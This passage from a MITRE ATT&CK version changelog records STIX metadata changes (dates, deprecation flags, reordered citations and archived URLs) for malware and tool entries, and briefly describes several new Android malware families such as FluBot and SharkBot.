external_references[5]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
external_references[5]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://securelist.com/a-slice-of-2017-sofacy-activity/83930/
external_references[6]['source_name'] | Securelist Sofacy Feb 2018 | Sofacy
external_references[6]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018. | This designation has been used in reporting both to refer to the threat group ([APT28](https://attack.mitre.org/groups/G0007)) and its associated malware.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)(Citation: Securelist Sofacy Feb 2018)
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0144] ChChes

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 18:49:40.093000+00:00 | 2023-03-23 15:14:18.599000+00:00
external_references[4]['source_name'] | Palo Alto menuPass Feb 2017 | Twitter Nick Carr APT10
external_references[4]['description'] | Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017. | Carr, N.. (2017, April 6). Retrieved June 29, 2017.
external_references[4]['url'] | http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/ | https://twitter.com/ItsReallyNick/status/850105140589633536
external_references[5]['source_name'] | JPCERT ChChes Feb 2017 | FireEye APT10 April 2017
external_references[5]['description'] | Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017. | FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.
external_references[5]['url'] | http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html | https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html
external_references[6]['source_name'] | PWC Cloud Hopper Technical Annex April 2017 | Palo Alto menuPass Feb 2017
external_references[6]['description'] | PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017. | Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.
external_references[6]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf | http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/
external_references[7]['source_name'] | FireEye APT10 April 2017 | JPCERT ChChes Feb 2017
external_references[7]['description'] | FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017. | Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.
external_references[7]['url'] | https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html | http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html
external_references[8]['source_name'] | Twitter Nick Carr APT10 | PWC Cloud Hopper Technical Annex April 2017
external_references[8]['description'] | Carr, N.. (2017, April 6). Retrieved June 29, 2017. | PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
external_references[8]['url'] | https://twitter.com/ItsReallyNick/status/850105140589633536 | https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0608] Conficker

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2022-04-25 14:00:00.188000+00:00 | 2023-03-08 22:15:47.458000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0591] ConnectWise

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2021-03-18 14:54:01.053000+00:00 | 2023-04-13 13:09:38.786000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0115] Crimson

Current version: 1.3

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-22 18:16:11.378000+00:00 | 2023-03-26 18:39:01.095000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0021] Derusbi

Current version: 1.2

Details
values_changed
STIX Field | Old value | New value
modified | 2022-04-15 15:04:10.654000+00:00 | 2023-03-20 22:03:44.668000+00:00
external_references[5]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0038] Duqu

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2022-04-25 14:00:00.188000+00:00 | 2023-03-08 22:17:50.971000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0605] EKANS

Current version: 2.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-11 14:00:00.188000+00:00 | 2023-03-08 22:04:48.834000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0152] EvilGrab

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2020-03-30 16:22:54.155000+00:00 | 2023-03-23 15:14:18.597000+00:00
external_references[1]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf | https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0061] HDoor

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2019-04-25 02:33:53.419000+00:00 | 2023-04-04 20:20:59.961000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0009] Hikit

Current version: 1.3

Details
dictionary_item_added
STIX Field | Old value | New value
x_mitre_deprecated | (none) | False
values_changed
STIX Field | Old value | New value
modified | 2022-01-12 16:21:44.692000+00:00 | 2023-03-20 22:03:44.668000+00:00
external_references[1]['source_name'] | Novetta-Axiom | FireEye Hikit Rootkit
external_references[1]['description'] | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.
external_references[1]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html
external_references[2]['source_name'] | FireEye Hikit Rootkit | Novetta-Axiom
external_references[2]['description'] | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.
external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0203] Hydraq

Current version: 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 14:57:44.182000+00:00 | 2023-03-20 22:03:44.662000+00:00
external_references[16]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0387] KeyBoy

Current version: 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-02-09 14:04:15.433000+00:00 | 2023-03-23 15:22:36.377000+00:00
external_references[2]['source_name'] | CitizenLab KeyBoy Nov 2016 | Rapid7 KeyBoy Jun 2013
external_references[2]['description'] | Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019. | Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019.
external_references[2]['url'] | https://citizenlab.ca/2016/11/parliament-keyboy/ | https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/
external_references[3]['source_name'] | PWC KeyBoys Feb 2017 | CitizenLab KeyBoy Nov 2016
external_references[3]['description'] | Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019. | Hulcoop, A., et al. (2016, November 17). It’s Parliamentary KeyBoy and the targeting of the Tibetan Community. Retrieved June 13, 2019.
external_references[3]['url'] | https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html | https://citizenlab.ca/2016/11/parliament-keyboy/
external_references[4]['source_name'] | Rapid7 KeyBoy Jun 2013 | PWC KeyBoys Feb 2017
external_references[4]['description'] | Guarnieri, C., Schloesser M. (2013, June 7). KeyBoy, Targeted Attacks against Vietnam and India. Retrieved June 14, 2019. | Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.
external_references[4]['url'] | https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/ | https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0607] KillDisk

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-11 14:00:00.188000+00:00 | 2023-03-08 22:13:42.357000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0372] LockerGoga

Current version: 2.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-23 21:22:58.477000+00:00 | 2023-03-08 22:03:50.370000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0508] Ngrok

Current version: 1.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-06 19:49:28.441000+00:00 | 2023-04-13 13:24:56.579000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0368] NotPetya

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2022-04-25 14:00:00.188000+00:00 | 2023-03-08 22:11:21.842000+00:00
external_references[4]['source_name'] | Petrwrap | Nyetya
external_references[4]['description'] | (Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017) | (Citation: Talos Nyetya June 2017)
external_references[5]['source_name'] | Nyetya | Petrwrap
external_references[5]['description'] | (Citation: Talos Nyetya June 2017) | (Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)
external_references[6]['source_name'] | Talos Nyetya June 2017 | ESET Telebots June 2017
external_references[6]['description'] | Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019. | Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.
external_references[6]['url'] | https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html | https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
external_references[7]['source_name'] | US-CERT NotPetya 2017 | Talos Nyetya June 2017
external_references[7]['description'] | US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019. | Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
external_references[7]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-181A | https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
external_references[8]['source_name'] | ESET Telebots June 2017 | US District Court Indictment GRU Unit 74455 October 2020
external_references[8]['description'] | Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020. | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[8]['url'] | https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/ | https://www.justice.gov/opa/press-release/file/1328521/download
external_references[9]['source_name'] | US District Court Indictment GRU Unit 74455 October 2020 | US-CERT NotPetya 2017
external_references[9]['description'] | Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. | US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.
external_references[9]['url'] | https://www.justice.gov/opa/press-release/file/1328521/download | https://www.us-cert.gov/ncas/alerts/TA17-181A
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0138] OLDBAIT

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-19 23:51:58.976000+00:00 | 2023-03-26 17:51:20.402000+00:00
external_references[1]['source_name'] | FireEye APT28 | FireEye APT28 January 2017
external_references[1]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.
external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf
external_references[2]['source_name'] | FireEye APT28 January 2017 | FireEye APT28
external_references[2]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0012] PoisonIvy

Current version: 2.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-30 21:02:39.862000+00:00 | 2023-03-20 22:03:44.669000+00:00
external_references[7]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S1040] Rclone

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-30 15:20:46.871000+00:00 | 2023-04-13 13:14:41.257000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0153] RedLeaves

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-03-30 21:01:05.439000+00:00 | 2023-03-23 15:14:18.594000+00:00
external_references[3]['source_name'] | PWC Cloud Hopper Technical Annex April 2017 | Twitter Nick Carr APT10
external_references[3]['description'] | PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017. | Carr, N.. (2017, April 6). Retrieved June 29, 2017.
external_references[3]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf | https://twitter.com/ItsReallyNick/status/850105140589633536
external_references[5]['source_name'] | Twitter Nick Carr APT10 | PWC Cloud Hopper Technical Annex April 2017
external_references[5]['description'] | Carr, N.. (2017, April 6). Retrieved June 29, 2017. | PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
external_references[5]['url'] | https://twitter.com/ItsReallyNick/status/850105140589633536 | https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0332] Remcos

Current version: 1.3

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-16 15:40:41.093000+00:00 | 2022-12-23 14:07:20.658000+00:00
external_references[4]['url'] | https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/ | https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0692] SILENTTRINITY

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-21 12:01:12.083000+00:00 | 2023-04-14 19:27:39.308000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_contributors[0] | Daniel Acevedo, Blackbot | Daniel Acevedo, @darmad0, ARMADO

[S0266] TrickBot

Current version: 2.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-01 14:19:20.660000+00:00 | 2023-02-23 19:45:50.419000+00:00
external_references[2]['source_name'] | Totbrick | TSPY_TRICKLOAD
external_references[2]['description'] | (Citation: Trend Micro Totbrick Oct 2016) (Citation: Microsoft Totbrick Oct 2017) | (Citation: Trend Micro Totbrick Oct 2016)
external_references[3]['source_name'] | TSPY_TRICKLOAD | Totbrick
external_references[3]['description'] | (Citation: Trend Micro Totbrick Oct 2016) | (Citation: Trend Micro Totbrick Oct 2016) (Citation: Microsoft Totbrick Oct 2017)
external_references[4]['source_name'] | S2 Grupo TrickBot June 2017 | Trend Micro Totbrick Oct 2016
external_references[4]['description'] | Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018. | Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.
external_references[4]['url'] | https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n
external_references[5]['source_name'] | Fidelis TrickBot Oct 2016 | IBM TrickBot Nov 2016
external_references[5]['description'] | Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018. | Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018.
external_references[5]['url'] | https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre | https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
external_references[6]['source_name'] | IBM TrickBot Nov 2016 | TrendMicro Trickbot Feb 2019
external_references[6]['description'] | Keshet, L. (2016, November 09). Tricks of the Trade: A Deeper Look Into TrickBot’s Machinations. Retrieved August 2, 2018. | Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019.
external_references[6]['url'] | https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/ | https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/
external_references[8]['source_name'] | Trend Micro Totbrick Oct 2016 | Microsoft Totbrick Oct 2017
external_references[8]['description'] | Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018. | Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018.
external_references[8]['url'] | https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n | https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick
external_references[9]['source_name'] | TrendMicro Trickbot Feb 2019 | Fidelis TrickBot Oct 2016
external_references[9]['description'] | Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019. | Reaves, J. (2016, October 15). TrickBot: We Missed you, Dyre. Retrieved August 2, 2018.
external_references[9]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/ | https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre
external_references[10]['source_name'] | Microsoft Totbrick Oct 2017 | S2 Grupo TrickBot June 2017
external_references[10]['description'] | Pornasdoro, A. (2017, October 12). Trojan:Win32/Totbrick. Retrieved September 14, 2018. | Salinas, M., Holguin, J. (2017, June). Evolution of Trickbot. Retrieved July 31, 2018.
external_references[10]['url'] | https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick | https://www.securityartwork.es/wp-content/uploads/2017/07/Trickbot-report-S2-Grupo.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0366] WannaCry

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2022-04-25 14:00:00.188000+00:00 | 2023-03-08 22:20:20.868000+00:00
external_references[1]['source_name'] | WanaCry | WanaCrypt0r
external_references[1]['description'] | (Citation: SecureWorks WannaCry Analysis) | (Citation: LogRhythm WannaCry)
external_references[2]['source_name'] | WanaCrypt | WCry
external_references[2]['description'] | (Citation: SecureWorks WannaCry Analysis) | (Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)
external_references[3]['source_name'] | WanaCrypt0r | WanaCry
external_references[3]['description'] | (Citation: LogRhythm WannaCry) | (Citation: SecureWorks WannaCry Analysis)
external_references[4]['source_name'] | WCry | WanaCrypt
external_references[4]['description'] | (Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis) | (Citation: SecureWorks WannaCry Analysis)
external_references[5]['source_name'] | LogRhythm WannaCry | FireEye WannaCry 2017
external_references[5]['description'] | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. | Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[5]['url'] | https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ | https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
external_references[6]['source_name'] | US-CERT WannaCry 2017 | SecureWorks WannaCry Analysis
external_references[6]['description'] | US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019. | Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.
external_references[6]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-132A | https://www.secureworks.com/research/wcry-ransomware-analysis
external_references[8]['source_name'] | FireEye WannaCry 2017 | LogRhythm WannaCry
external_references[8]['description'] | Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. | Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
external_references[8]['url'] | https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html | https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/
external_references[9]['source_name'] | SecureWorks WannaCry Analysis | US-CERT WannaCry 2017
external_references[9]['description'] | Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. | US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.
external_references[9]['url'] | https://www.secureworks.com/research/wcry-ransomware-analysis | https://www.us-cert.gov/ncas/alerts/TA17-132A
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0141] Winnti for Windows

Current version: 3.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 16:38:19.439000+00:00 | 2023-03-20 22:02:53.982000+00:00
external_references[5]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0388] YAHOYAH

Current version: 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-05-21 17:23:45.362000+00:00 | 2023-03-23 15:24:22.256000+00:00
external_references[1]['url'] | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf | https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0672] Zox

Current version: 1.0

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 16:01:23.818000+00:00 | 2023-03-20 22:03:44.670000+00:00
external_references[4]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0412] ZxShell

Current version: 1.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-04-15 15:01:42.835000+00:00 | 2023-03-23 15:27:10.501000+00:00
external_references[4]['url'] | https://content.fireeye.com/apt-41/rpt-apt41 | https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

[S0032] gh0st RAT

Current version: 3.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-09-30 21:03:21.873000+00:00 | 2023-03-20 22:03:44.666000+00:00
external_references[5]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

mobile-attack

New Software

[S1061] AbstractEmu

Current version: 1.0

Description: [AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)


[S1054] Drinik

Current version: 1.0

Description: [Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)


[S1067] FluBot

Current version: 1.0

Description: [FluBot](https://attack.mitre.org/software/S1067) is a multi-purpose mobile banking malware that was first observed in Spain in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)


[S1062] S.O.V.A.

Current version: 1.0

Description: [S.O.V.A.](https://attack.mitre.org/software/S1062) is an Android banking trojan that was first identified in August 2021 and has subsequently been found in a variety of applications, including banking, cryptocurrency wallet/exchange, and shopping apps. [S.O.V.A.](https://attack.mitre.org/software/S1062), which is Russian for "owl", contains features not commonly found in Android malware, such as session cookie theft.(Citation: threatfabric_sova_0921)(Citation: cleafy_sova_1122)


[S1055] SharkBot

Current version: 1.0

Description: [SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)


[S1069] TangleBot

Current version: 1.0

Description: [TangleBot](https://attack.mitre.org/software/S1069) is SMS malware that was initially observed in September 2021, primarily targeting mobile users in the United States and Canada. [TangleBot](https://attack.mitre.org/software/S1069) has used SMS text message lures about COVID-19 regulations and vaccines to trick mobile users into downloading the malware, similar to [FluBot](https://attack.mitre.org/software/S1067) Android malware campaigns.(Citation: cloudmark_tanglebot_0921)


[S1056] TianySpy

Current version: 1.0

Description: [TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122)

Major Version Changes

[S0311] YiSpecter

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
[YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter)

New Description
